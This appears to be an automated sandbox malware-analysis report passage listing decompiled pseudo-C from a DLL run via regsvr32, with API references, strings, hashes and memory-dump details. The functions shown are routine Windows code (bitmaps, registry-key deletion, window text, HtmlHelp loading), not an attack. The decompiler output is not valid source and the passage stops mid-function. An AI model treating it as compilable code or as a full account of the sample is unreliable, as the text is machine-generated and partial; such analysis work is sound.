_strlen.LIBCMT ref: 10001971
_strlen.LIBCMT ref: 100019B6
LoadIconA.USER32 ref: 100019FD

Strings

127.0.0.1, xrefs: 100018E8, 100018FA, 1000190E

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: 127.0.0.1
API String ID: 858515944-3619153832
Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1001486F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10057a08; // 0x3643b451
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E100146B2(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E100146DD(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100169F6(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

0x1001486f
0x1001486f
0x1001486f
0x10014875
0x1001487c
0x10014883
0x10014889
0x1001488c
0x10014895
0x10014896
0x1001489f
0x100148ad
0x100148b0
0x100148b8
0x100148ce
0x100148d0
0x100148d3
0x100148db
0x100148d5
0x100148d5
0x100148d5
0x100148ea
0x10014968
0x10014968
0x100148ec
0x10014901
0x10014906
0x10014909
0x00000000
0x1001490b
0x1001490c
0x10014912
0x10014917
0x10014919
0x1001491f
0x10014924
0x10014928
0x10014928
0x1001492c
0x10014930
0x10014933
0x10014937
0x1001493a
0x10014941
0x10014944
0x1001494c
0x10014946
0x10014946
0x10014946
0x10014953
0x10014978
0x1001497f
0x10014988
0x10014990
0x1001499d
0x100149a0
0x100149a6
0x100149ac
0x1001495a
0x1001495a
0x10014961
0x10014966
0x10014970
0x10014975
0x00000000
0x00000000
0x00000000
0x00000000
0x10014966
0x10014953
0x10014909
0x100149ad
0x100149ae
0x1001488e
0x1001488e
0x1001488e
0x100149bb

APIs

GlobalLock.KERNEL32 ref: 10014899
lstrlenA.KERNEL32(?), ref: 100148E1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB

Strings

System, xrefs: 10014895

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B3AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000B3AF(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10057a08; // 0x3643b451
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10057298;
					E10017C83( &_v172, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, _t38, _t42, _t43);
					_t40 = E10013965(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000CF71(_t40);
					}
					return E10017C60(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1002a144;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x1005aa80 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x1005aa80 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

0x1000b3b0
0x1000b3ba
0x1000b3c1
0x1000b3c5
0x1000b3c6
0x1000b3c7
0x1000b3cd
0x1000b3d6
0x1000b3d9
0x1000b3dc
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000b3e8
0x1000b3eb
0x1000b3ef
0x1000b3ef
0x1000b3f0
0x1000b3f3
0x1000b3f4
0x1000b3f6
0x1000b3f9
0x1000b3fe
0x1000b402
0x1000b405
0x1000b407
0x1000b40c
0x1000b410
0x1000b410
0x1000b413
0x1000b416
0x1000b418
0x1000b418
0x1000b429
0x1000b431
0x1000b439
0x1000b43c
0x1000b43f
0x1000b443
0x1000b448
0x1000b44b
0x1000b452
0x1000b452
0x1000b456
0x1000b458
0x1000b45b
0x1000b45f
0x1000b462
0x1000b464
0x1000b467
0x1000b46a
0x1000b46a
0x1000b46a
0x1000b46f
0x1000b47b
0x1000b483
0x1000b484
0x1000b485
0x1000b48a
0x1000b48b
0x1000b493
0x1000b499
0x1000b499
0x1000b49e
0x1000b4a1
0x1000b4a3
0x1000b4a8
0x1000b4ab
0x1000b4ab
0x1000b4ac
0x1000b4ac

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
_memset.LIBCMT ref: 1000B429
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
LoadBitmapA.USER32 ref: 1000B493

Strings

, xrefs: 1000B3E8

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750

Uniqueness

Uniqueness Score: -1.00%

Function 1000D86F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E1000D6C3() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1005a760(_a4, _a8);
			}

0x1000d87c
0x1000d895
0x1000d900
0x1000d900
0x1000d902
0x00000000
0x1000d903
0x1000d897
0x1000d89e
0x00000000
0x1000d8b7
0x1000d8b8
0x1000d8bb
0x1000d8c9
0x1000d8cc
0x1000d8d4
0x1000d8d5
0x1000d8d6
0x1000d8d7
0x1000d8de
0x1000d8e1
0x1000d8e5
0x1000d8f4
0x1000d8f9
0x1000d8fc
0x00000000
0x1000d8fc
0x1000d89e
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
GetSystemMetrics.USER32 ref: 1000D8C5
GetSystemMetrics.USER32 ref: 1000D8CC

Strings

B, xrefs: 1000D88C
DISPLAY, xrefs: 1000D8E9

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C570, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
					_t10 = E1001040B(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E1000E426(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x1000c570
0x1000c570
0x1000c572
0x1000c577
0x1000c580
0x1000c589
0x1000c58e
0x1000c590
0x1000c59c
0x1000c59c
0x1000c5a3
0x1000c5fe
0x00000000
0x1000c601
0x1000c5a5
0x1000c5a8
0x1000c5ab
0x1000c5b2
0x1000c5bc
0x1000c5be
0x00000000
0x00000000
0x1000c5c7
0x1000c5cc
0x1000c5ce
0x00000000
0x00000000
0x1000c5d5
0x1000c5db
0x1000c5dd
0x1000c5ea
0x1000c5f6
0x00000000
0x1000c5f6
0x1000c5e0
0x1000c5e6
0x1000c5e8
0x00000000
0x00000000
0x00000000
0x1000c5e8
0x1000c5ad
0x1000c5b0
0x00000000
0x00000000
0x00000000
0x1000c5b0
0x1000c592
0x1000c596
0x00000000
0x00000000
0x00000000
0x1000c598
0x1000c582
0x00000000

Strings

Edit, xrefs: 1000C5C0

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC89, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10057a08; // 0x3643b451
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E10017BF4(E10027F23, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

0x1000bc89
0x1000bc90
0x1000bc94
0x1000bc9b
0x1000bca1
0x1000bca8
0x1000bcad
0x1000bcb5
0x1000bcbb
0x1000bcc1
0x1000bcc4
0x1000bcc7
0x1000bccd
0x1000bcd1
0x1000bcd7
0x1000bce5
0x1000bceb
0x1000bced
0x1000bcef
0x00000000
0x00000000
0x1000bcf1
0x1000bcf7
0x1000bcfb
0x1000bd07
0x1000bd13
0x1000bd17
0x1000bd1d
0x1000bd21
0x1000bd28
0x1000bd2a
0x00000000
0x1000bd2a
0x00000000
0x1000bd28
0x1000bd4b
0x1000bd51
0x1000bd5b
0x1000bd66
0x1000bd53
0x1000bd53
0x1000bd59
0x00000000
0x00000000
0x1000bd59
0x1000bd6b
0x1000bd6b
0x1000bd76
0x1000bd7e
0x1000bd7f
0x1000bd80
0x1000bd89
0x1000bd8e
0x1000bd95

APIs

__EH_prolog3_catch.LIBCMT ref: 1000BCA8
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
RegCloseKey.ADVAPI32(?), ref: 1000BD6B

Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013F9E, Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10057a08; // 0x3643b451
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E100174D0(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

0x10013f9e
0x10013f9e
0x10013fa7
0x10013fae
0x10013fb2
0x10013fb5
0x10013fb8
0x10013fbc
0x10013fbe
0x10013fbe
0x10013fbe
0x10013fc5
0x00000000
0x00000000
0x10013fd3
0x10013fde
0x10013fe5
0x10013ff4
0x1001401d
0x1001401d
0x10014031

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
_memset.LIBCMT ref: 10013FE5
GetWindowTextA.USER32 ref: 10013FFF
lstrcmpA.KERNEL32(00000000,?), ref: 10014011
SetWindowTextA.USER32(?,?), ref: 1001401D

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010C0F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E1001431B(__ebx, _t25, __ebp, 0xc);
				_push(E100100DE);
				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E10014388(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x10010c0f
0x10010c0f
0x10010c0f
0x10010c12
0x10010c17
